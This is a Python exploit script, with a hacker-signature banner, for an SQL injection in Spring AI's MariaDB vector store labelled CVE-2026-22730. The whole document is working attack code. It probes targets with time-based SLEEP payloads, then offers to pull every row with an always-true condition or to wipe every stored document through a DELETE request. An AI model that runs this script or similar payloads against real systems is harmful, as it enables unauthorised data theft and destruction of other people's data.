#!/usr/bin/env python3 print(""" ███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░  ░█████╗░██╗░░██╗ ████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗  ██╔══██╗██║░██╔╝ ██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║  ██║░░██║█████═╝░ ██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║  ██║░░██║██╔═██╗░ ██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝  ╚█████╔╝██║░╚██╗ ╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░  ░╚════╝░╚═╝░░╚═╝ CVE-2026-22730 Scanner & Exploit SQL Injection in Spring AI's MariaDB Vector Store Supports GET (query parameter) and POST (JSON body) with placeholder. NULL200OK 💀🔥created by NABEEL 🔥💀 """) import requests import time import json import sys import argparse from datetime import datetime from urllib.parse import urlencode, quote_plus # --------------------------- # Configuration # --------------------------- DEFAULT_SLEEP = 5 # seconds for time-based detection TIMEOUT = 10 # HTTP request timeout USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Marker for payload replacement in POST JSON PAYLOAD_MARKER = "__PAYLOAD__" # --------------------------- # Helper Functions # --------------------------- def send_request(base_url, method, param_name, value, json_template=None): """ Send an HTTP request with the injected value. Supports GET (query parameter) and POST (JSON body with placeholder). Returns (response, elapsed_time). """ headers = {"User-Agent": USER_AGENT} method = method.upper() if method == "GET": params = {param_name: value} url = base_url + "?" + urlencode(params, quote_via=quote_plus) try: start = time.time() resp = requests.get(url, headers=headers, timeout=TIMEOUT) elapsed = time.time() - start return resp, elapsed except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None, 0 elif method == "POST": if not json_template: print("[!] POST method requires --json-template with placeholder.") return None, 0 # Replace marker with actual value body_str = json_template.replace(PAYLOAD_MARKER, value) try: body = json.loads(body_str) except json.JSONDecodeError: print("[!] Invalid JSON template.") return None, 0 headers["Content-Type"] = "application/json" try: start = time.time() resp = requests.post(base_url, json=body, headers=headers, timeout=TIMEOUT) elapsed = time.time() - start return resp, elapsed except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None, 0 elif method == "DELETE": # For DELETE, we can either send query param or JSON body. # We'll support query parameter (as in original advisory) and JSON body if template provided. if json_template: # DELETE with JSON body (some APIs accept it) body_str = json_template.replace(PAYLOAD_MARKER, value) try: body = json.loads(body_str) except json.JSONDecodeError: print("[!] Invalid JSON template.") return None, 0 headers["Content-Type"] = "application/json" try: start = time.time() resp = requests.delete(base_url, json=body, headers=headers, timeout=TIMEOUT) elapsed = time.time() - start return resp, elapsed except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None, 0 else: # DELETE with query parameter params = {param_name: value} url = base_url + "?" + urlencode(params, quote_via=quote_plus) try: start = time.time() resp = requests.delete(url, headers=headers, timeout=TIMEOUT) elapsed = time.time() - start return resp, elapsed except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None, 0 else: print(f"[!] Unsupported method: {method}") return None, 0 def detect_vulnerability(url, method, param, sleep_time, baseline_value="nonexistent", json_template=None): """ Time‑based detection: compare normal request vs. SLEEP payload. Returns True if vulnerable, False otherwise. """ print("[*] Sending baseline request...") resp1, time1 = send_request(url, method, param, baseline_value, json_template) if resp1 is None: print("[!] Baseline request failed. Exiting.") return False # SQLi payload that tries to inject a SLEEP payload = f"' OR SLEEP({sleep_time}) --" print(f"[*] Sending time‑based payload: {payload}") resp2, time2 = send_request(url, method, param, payload, json_template) if resp2 is None: print("[!] Payload request failed. Exiting.") return False print(f"[*] Baseline time: {time1:.2f}s, Payload time: {time2:.2f}s") # If payload took at least sleep_time seconds longer, consider vulnerable if time2 - time1 >= sleep_time - 1: # allow 1s network jitter print("[+] Target appears VULNERABLE to SQL injection!") return True else: print("[-] Target does NOT seem vulnerable.") return False def exploit_retrieve_all(url, method, param, json_template=None): """ Send payload that retrieves all rows (by making WHERE clause always true). Returns the response text. """ payload = "' OR '1'='1" print(f"[*] Exploiting with payload (retrieve all): {payload}") resp, _ = send_request(url, method, param, payload, json_template) if resp: return resp.text else: return "" def exploit_delete_all(url, method, param, json_template=None): """ Send payload that deletes all rows. Returns the response text (if any). """ payload = "' OR '1'='1" print(f"[*] Exploiting with payload (DELETE all): {payload}") # Use DELETE method resp, _ = send_request(url, "DELETE", param, payload, json_template) if resp: return resp.text else: return "" def save_results(data, target_url, method, vuln_status, exploit_data=None, exploit_type=None): """ Save results in HTML, JSON, and TXT files. """ timestamp = datetime.now().strftime("%Y%m%d_%H%M%S") base_filename = f"cve-2026-22730_{timestamp}" # Prepare data structure report = { "timestamp": timestamp, "target": target_url, "method": method, "vulnerable": vuln_status, "detection_method": "time-based SQL injection", "exploit_type": exploit_type, "exploit_result": exploit_data if exploit_data else None } # JSON with open(f"{base_filename}.json", "w") as f: json.dump(report, f, indent=4) print(f"[+] JSON report saved: {base_filename}.json") # TXT with open(f"{base_filename}.txt", "w") as f: f.write(f"CVE-2026-22730 Scan Report\n") f.write(f"Timestamp: {timestamp}\n") f.write(f"Target: {target_url}\n") f.write(f"Method: {method}\n") f.write(f"Vulnerable: {vuln_status}\n") if exploit_type: f.write(f"Exploit performed: {exploit_type}\n") if exploit_data: f.write("\n--- Exploitation Result ---\n") f.write(exploit_data) print(f"[+] TXT report saved: {base_filename}.txt") # HTML html_content = f""" CVE-2026-22730 Scan Report

CVE-2026-22730 SQL Injection Scanner

Timestamp: {timestamp}

Target URL: {target_url}

HTTP Method: {method}

Vulnerable: {vuln_status}

Exploitation

Type: {exploit_type if exploit_type else "None"}

{exploit_data if exploit_data else "No exploitation performed."}
""" with open(f"{base_filename}.html", "w") as f: f.write(html_content) print(f"[+] HTML report saved: {base_filename}.html") # --------------------------- # Main # --------------------------- def main(): parser = argparse.ArgumentParser(description="CVE-2026-22730 Scanner") parser.add_argument("--url", help="Base URL (e.g., http://localhost:8081/api/docs)") parser.add_argument("--method", default="GET", choices=["GET", "POST"], help="HTTP method (default: GET)") parser.add_argument("--param", help="Query parameter name (for GET) or marker name (for POST, optional)") parser.add_argument("--json-template", help="JSON template with __PAYLOAD__ placeholder (required for POST)") parser.add_argument("--baseline", default="nonexistent", help="Baseline value for normal request (default: nonexistent)") parser.add_argument("--sleep", type=int, default=DEFAULT_SLEEP, help=f"Sleep seconds for time-based detection (default: {DEFAULT_SLEEP})") args = parser.parse_args() # Interactive mode if arguments missing if not args.url: print("=== CVE-2026-22730 Scanner ===\n") args.url = input("Enter target URL: ").strip() args.method = input("HTTP method (GET/POST) [GET]: ").strip().upper() or "GET" if args.method not in ["GET", "POST"]: print("[!] Invalid method. Using GET.") args.method = "GET" if args.method == "GET": args.param = input("Enter query parameter name (e.g., department): ").strip() else: # POST args.param = input("Enter a name for the injected field (optional, for reference): ").strip() or "payload" args.json_template = input("Enter JSON template with __PAYLOAD__ placeholder: ").strip() if PAYLOAD_MARKER not in args.json_template: print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'. Exiting.") sys.exit(1) baseline_input = input("Enter a benign value for baseline (default: nonexistent): ").strip() if baseline_input: args.baseline = baseline_input sleep_input = input(f"Enter sleep time for detection (default {DEFAULT_SLEEP}): ").strip() if sleep_input: try: args.sleep = int(sleep_input) except ValueError: print("[!] Invalid number. Using default.") else: # Validate arguments if args.method == "POST" and not args.json_template: print("[!] POST method requires --json-template with __PAYLOAD__ placeholder.") sys.exit(1) if args.method == "POST" and PAYLOAD_MARKER not in args.json_template: print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'.") sys.exit(1) if args.method == "GET" and not args.param: print("[!] GET method requires --param.") sys.exit(1) # Remove trailing slash if present args.url = args.url.rstrip("/") print(f"\n[*] Targeting: {args.url} with method {args.method}") # Step 1: Detection vuln = detect_vulnerability(args.url, args.method, args.param, args.sleep, args.baseline, args.json_template) exploit_data = None exploit_type = None if vuln: print("\n[?] Target is vulnerable. Choose exploitation option:") print(" 1. Retrieve all documents (SELECT injection)") print(" 2. Delete all documents (DELETE injection) - DESTRUCTIVE") print(" 3. Skip exploitation") choice = input("Enter 1, 2, or 3: ").strip() if choice == '1': exploit_type = "RETRIEVE_ALL" exploit_data = exploit_retrieve_all(args.url, args.method, args.param, args.json_template) if exploit_data: print("[+] Data retrieval completed.") else: print("[!] Exploit failed or returned no data.") elif choice == '2': print("\n[!] WARNING: This will DELETE ALL documents from the vector store!") confirm = input("Type 'yes' to confirm: ").strip().lower() if confirm == 'yes': exploit_type = "DELETE_ALL" exploit_data = exploit_delete_all(args.url, args.method, args.param, args.json_template) if exploit_data: print("[+] Delete request sent. Check response.") else: print("[!] Delete exploit failed.") else: print("[*] Deletion cancelled.") else: print("[*] Skipping exploitation.") # Step 3: Save results save_results(exploit_data, args.url, args.method, vuln, exploit_data, exploit_type) if __name__ == "__main__": main()